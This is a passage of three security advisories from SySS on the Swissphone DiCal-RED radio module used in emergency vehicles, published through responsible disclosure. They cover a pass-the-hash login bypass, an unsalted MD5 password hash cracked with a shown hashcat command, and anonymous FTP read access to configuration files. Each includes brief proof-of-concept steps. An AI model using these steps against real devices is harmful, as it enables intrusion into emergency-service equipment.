client side and submitted. An attacker who knows the hash of the correct password but not the password itself can simply replace the value of the password URL parameter with the correct hash and subsequently gain full access to the administrative web interface. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Access the device's web interface and log in with an arbitrary password. 2. Use a local proxy or browser plug-in to intercept the HTTP requests. One of them looks like this: http://192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=validatepassword&password=2ab96390c7dbe3439de74d0c9b0b1767 3. Replace the value of the password parameter with the hash of the correct device password. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer recommends not running the device in an untrusted network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-02-29: Vulnerability discovered 2024-04-16: Vulnerability reported to manufacturer 2024-05-10: Manufacturer states that the vulnerability will not be fixed 2024-05-14: Vulnerability reported to CERT-Bund 2024-08-13: CERT-Bund informs us that the vendor declared the product EOL 2024-08-20: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for DiCal-RED https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/ [2] SySS Security Advisory SYSS-2024-038 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-038.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Hamann of SySS GmbH. E-Mail: sebastian.hamann@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc Key ID: 0x9CE0E440429D8B96 Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd i5bDcg//QqSSeXrwj8+F+lGJBRgcwK8Qf7LWK3IWovj+DSKR0II7n6voq+ZG2LPS BpO8EEjhSbWDkGHCBgyuvZ8NoXu3LSX3mAVpAvrK+Rq8rPXE1dTxINAilq9Z8Q0r bjwybUrN6T0W7uc/Z9VtQiMH1hY1fbkcRbp0RWtzdo0cIjhKs7aBWf1bNIdDaiX8 Mnyc/5nM65IXPjUdGSFvgNDcUOxG7IRlrPvHncjeiJge8JVqSJUiD410ZpvcBS8x 6SPBwl+OqWxF5mnmP2iOixDVMyiZl9AlzaUMA4BISsTRrkSugJmOJTwZGusCZIlZ KjikGfjvtIIjC31pqzBuX9uwWT59YBlA4zoNl2gHBzFy0zwZKVSIX2IxhsmqfHci XthTlkjX+sY8u9XiMKZU6hYAwUOGFo9+i6L34X/XykztFmwjUluOdOQDzXVoA0wm mZ1OEAYOdccr/BakIhTJQONKGzGErZWEUGBcyHOccw4AYQwn19bR7kGXqXZ6/DQB w0od4XFWuWVVO/OC6HPCH+vsrjFCze4pPAuGbzKzuPc3bBxWp/gYS5znKFGMwyTf wOGCi3YKfPzqze4yC46wbviDfjStEe7ljbAVkuy4r8XLh5MPMLCb/3YPgbhdiqUk X1OuQWRmHGp9WnzB2uYfK/+EKZNPthT3gDqZoyGWlISm+6C22no= =Y5jL -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-037 Product: DiCal-RED Manufacturer: Swissphone Wireless AG Affected Version(s): Unknown Tested Version(s): 4009 Vulnerability Type: Use of Password Hash With Insufficient Computational Effort (CWE-916) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2024-04-16 Solution Date: None Public Disclosure: 2024-08-20 CVE Reference: CVE-2024-36440 Author of Advisory: Sebastian Hamann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: DiCal-RED is a radio module for communication between emergency vehicles and control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity and runs a Linux- and BusyBox-based operating system. The manufacturer describes the product as follows (see [1]): "The DiCal-Red radio data module reliably guides you to your destination. This is ensured by the linking of navigation (also for the transmission of position data) and various radio modules." Due to a weak password hashing function, the device password is vulnerable to offline brute-force attacks in order to recover the password. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The device password is stored in the file /etc/deviceconfig as a plain MD5 hash, i.e. without any salt or computational cost function. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): root@DiCal-RED:~# cat /etc/deviceconfig PasswordActive=1 PasswordHash="2ab96390c7dbe3439de74d0c9b0b1767" [...] $ hashcat -m 0 -a 3 2ab96390c7dbe3439de74d0c9b0b1767 ?l?l?l?l?l?l?d [...] 2ab96390c7dbe3439de74d0c9b0b1767:hunter2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer recommends not running the device in an untrusted network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-02-29: Vulnerability discovered 2024-04-16: Vulnerability reported to manufacturer 2024-05-10: Manufacturer states that the vulnerability will not be fixed 2024-05-14: Vulnerability reported to CERT-Bund 2024-08-13: CERT-Bund informs us that the vendor declared the product EOL 2024-08-20: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for DiCal-RED https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/ [2] SySS Security Advisory SYSS-2024-037 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-037.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Hamann of SySS GmbH. E-Mail: sebastian.hamann@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc Key ID: 0x9CE0E440429D8B96 Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd i5YLLw/+KOVlJj9SE7BMWl9H9zO9YcNZPUvuC62/iAtn82r0bOTQAUjx3eSzxx01 BGqHEVozMOb4PHC1hTPGp+WHMaFNlcLgiyciFhckh4PpeIwtCCccg3+8BlJRmVPb pO+IWo16KcW/fYnqpu5fvHeKnC7UkauWBJiC5a72kjBqJeKreHjTJ3+lAOuMp5nt wTJAEVvlog+MNJzXipMTDzYlaw6YrMr5ukgou0iDKKNJpwMBwJpga0IvJGmubNOU YchVnsZOC7cXWqPBRFpNzKJifMZJ2rWPzoryIniR+ZdJn/M/wXr4IKZZJ0Oag/UT li1LdUlNby7QnPCB9T0TfAhS3uGn9tSulPG51Ei9COuKFcpGWqEBM+NZ5QHy/+7o 6uo8tHV34XV4ztsWWHp6Mjd9qDI/7iPFsSR4k+Zio5/5rPqOfhp2LuBFfnuLCuqY RLZnZ+eDuyUk4fsDLPP/2mRjfVf9+dskYBVqGbgjzNvgb2teTBxD3t31cdgyRNc7 LurHmE4h+h+qLT78E2i/iuRyvZFzAQ6miDNgFqDoTrp9XENtXSicmy0ABMPGMjCw jg0dzFT4AA7zhNN0HuPNX2fE0+dmy5g9t8HdNFJeG52uTMs6/CYGlu573oErlUru lr2Y2f3O06EHFnrR05OVM4TXuQF5VF5lHY/WmTCsOTWOYED2pjg= =tMX8 -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-036 Product: DiCal-RED Manufacturer: Swissphone Wireless AG Affected Version(s): Unknown Tested Version(s): 4009 Vulnerability Type: Missing Authentication for Critical Function (CWE-306) Risk Level: High Solution Status: Open Manufacturer Notification: 2024-04-16 Solution Date: None Public Disclosure: 2024-08-20 CVE Reference: CVE-2024-36443 Author of Advisory: Sebastian Hamann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: DiCal-RED is a radio module for communication between emergency vehicles and control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity and runs a Linux- and BusyBox-based operating system. The manufacturer describes the product as follows (see [1]): "The DiCal-Red radio data module reliably guides you to your destination. This is ensured by the linking of navigation (also for the transmission of position data) and various radio modules." Due to anonymous FTP access, the device is vulnerable to the disclosure of sensitive information, such as the device password's hash. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The device provides an FTP service on TCP port 21. This service allows anonymous access, i.e. logging in as the user "anonymous" with an arbitrary password. Anonymous users get read access to the whole file system of the device, including files that contain sensitive configuration information, such as /etc/deviceconfig. The respective process on the system runs as the system user "ftp". Therefore, a few files with restrictive permissions are not accessible via FTP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): $ ftp <IP or hostname> 220 ProFTPD 1.3.3g Server (ProFTPD) [192.0.2.1] 500 OPTS UTF8 not understood User (<IP or hostname>:(none)): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230 Anonymous access granted, restrictions apply ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list usb2 mnt etc dev proc lib home htdocs sbin media ram linuxrc root gprscfg run usr usb1 lost+found bin tmp sys var 226 Transfer complete ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer recommends not running the device in an untrusted network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-02-29: Vulnerability discovered 2024-04-16: Vulnerability reported to manufacturer 2024-05-10: Manufacturer states that the vulnerability will not be fixed 2024-05-14: Vulnerability reported to CERT-Bund 2024-08-13: CERT-Bund informs us that the vendor declared the product EOL 2024-08-20: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for DiCal-RED https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/ [2] SySS Security Advisory SYSS-2024-036 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-036.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Hamann of SySS GmbH. E-Mail: sebastian.hamann@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc Key ID: 0x9CE0E440429D8B96 Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd i5bypA/8CtRcEEdS48fPfKJRheIMG5qdEBv3Rq8rljg+PqkoqeL6G6ztRYQkbcaX Tl1+ajtOW3rPM9i9AExV6UIPG9IO+IY0v4vto1uHALZ7gkVeOe0bQXov0Lgbwr/y dWrpv4tMFNo48pDZEU9bl1+fb6VtPoiF2QPyjvylpiMe1ONrUpxqkd5HsNkAw2V7 90X+Ma/+awXITwwTL/7iX6ryCvSZjN72wd1m1S9tcrQ0+/dUnoIZCDWNnLMSroUq GoqxotzUD0ehDxSrKUG4eXY1yGjJcIRSjAspYfNCdOnzHmW3XgrgCkFoDHnB8RTv bhL+uwxu99eQMkyrhPBZ34hGmRjIDpywbnrG6iX3+1pBiIslQQ/u3BYDdpYx3MJE Rv0HX+qrHQxPFphb+ZvPO/LHJApwgmjvS81OutAnbAblOnBpapjcBN729Sd5B0Sn x+MdUZOGQGEPKCXkBnHh7Dpt4zUlM8lmFALNhk2dW+eioZhC3RaYXc8GmcB7QyFo OjyCcsP1yMjN2ITfw1Jg2NfPQ/o05RoWRAxa/zDepW4T4wDGguTyZCNdxsHAH3bV 2BtVF+jLOBhlf3/63RCzrRbiOIwKv6qkjjp5ymWwuALFaklpcjzFbx1Rwv9cl0Wy 8wbJBa6BgJOcAO0ODR+GyPCn79ZhvY6w9SqmXM9rWcVQb3Rz1Yk= =lCcl -----END PGP SIGNATURE----- </code></pre>